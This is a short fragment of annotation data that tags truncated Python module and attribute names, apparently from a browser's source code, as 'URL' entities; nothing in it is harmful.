['URL', 'os.path.jo'], ['URL', 'standarddir.ca'], ['URL', 'os.pa'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'configfiles.st'], ['URL', 'configfiles.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'log.init.in'], ['URL', 'os.pa'], ['URL', 'shutil.mo'], ['URL', 'usertypes.Ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'argparse.Na'], ['URL', 'savemanager.Sa'], ['URL', 'args.no'], ['URL', 'checker.ch']]"